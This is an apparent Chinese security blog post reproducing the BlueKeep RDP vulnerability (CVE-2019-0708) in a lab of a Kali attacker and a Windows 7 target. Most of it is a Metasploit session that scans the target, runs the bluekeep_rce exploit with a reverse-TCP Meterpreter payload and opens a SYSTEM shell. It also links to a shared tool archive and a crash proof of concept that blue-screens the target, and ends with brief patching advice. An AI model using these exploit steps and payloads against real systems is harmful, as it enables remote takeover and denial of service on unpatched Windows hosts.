标签：Windows x64 80.129 0708 2019 192.168 CVE

漏洞详情

Windows系列服务器于2019年5月15号，被爆出高危漏洞，该漏洞影响范围较广，漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞，跟之前的勒索，永恒之蓝病毒差不多。

漏洞影响版本

Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows XP SP3 x86
Windows XP Professional x64 Edition SP2
Windows XP Embedded SP3 x86
Windows Server 2003 SP2 x86
Windows Server 2003 x64 Edition SP2
Windows 8和Windows 10及之后版本的用户不受此漏洞影响

工具脚本分享

链接：https://pan.baidu.com/s/1iGZcW1OxmrYvdJEBdjlSgA?pwd=e3hr
提取码：e3hr

漏洞复现

1、复现环境

攻击机kali：192.168.80.128

靶机windwos7：192.168.80.129

2、windwos7开启远程桌面

点击允许远程访问。

3、在kali中启动msf，使用cve-2019-0708漏洞的扫描模板对靶机进行扫描。

msf6 > search 0708

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce   2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   2  exploit/windows/browser/clear_quest_cqole        2012-05-19       normal  No     IBM Rational ClearQuest CQOle Remote Code Execution
   3  exploit/windows/browser/tumbleweed_filetransfer  2008-04-07       great   No     Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer

msf6 > use 0
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.80.129
rhosts => 192.168.80.129
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[+] 192.168.80.129:3389   - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

从扫描结果可以看到靶机存在该漏洞。

4、使用msf反弹shell

反弹shell的前提：靶机和攻击机互通。

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > search 0708

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce   2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   2  exploit/windows/browser/clear_quest_cqole        2012-05-19       normal  No     IBM Rational ClearQuest CQOle Remote Code Execution
   3  exploit/windows/browser/tumbleweed_filetransfer  2008-04-07       great   No     Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use 1
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.80.129
rhosts => 192.168.80.129
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.80.128
lhost => 192.168.80.128
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 4444
lport => 4444
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
   5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
   6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
   7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
   8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
target => 1
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.80.128:4444
[*] 192.168.80.129:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.80.129:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.80.129:3389   - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[!] 192.168.80.129:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.80.129:3389 - Surfing channels ...
[*] 192.168.80.129:3389 - Lobbing eggs ...
[*] 192.168.80.129:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.80.129:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200774 bytes) to 192.168.80.129
[*] Meterpreter session 1 opened (192.168.80.128:4444 -> 192.168.80.129:49159) at 2022-12-12 15:16:09 +0800

meterpreter > shell
Process 2580 created.
Channel 1 created.
Microsoft Windows [▒汾 6.1.7601]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

其中设置target需要根据靶机的属性来原则，0代表自动根据指纹自动判断情况（不太好用），1代表真实机器，2代表目标系统在virtualbox虚拟机下运行，3、4、5代表代表目标系统在virtualbox虚拟机下运行，6代表目标系统在Hyper-V虚拟机下运行。如果用目标型号的targets利用不成功的话，就换其他的targets试一下（简单来说就是多试试就行了）

注：攻击 Windows 7 SP1 x64 与 Windows 2008 R2 x64的EXP不太稳定，针对 Windows 7 SP1 x64攻击有蓝屏现象。

批量检测脚本

windows下的python环境：

编辑3389_hosts，将待检测的IP地址写入文件，一行一个
命令行切换到代码所在的目录，运行python3 cve-2019-0708.py

蓝屏

使用漏洞POC进行测试： POC：https://github.com/n1xbyte/CVE-2019-0708 用法：python3 crashpoc.py ip地址系统类型

靶机已蓝屏。

漏洞修复

及时打对应系统的安全补丁
关闭3389端口或添加防火墙安全策略限制对3389端口的访问

参考

https://cloud.tencent.com/developer/article/2069868

标签：Windows,x64,80.129,0708,2019,192.168,CVE
From： https://www.cnblogs.com/pursue-security/p/16976231.html

CVE-2019-0708漏洞检测利用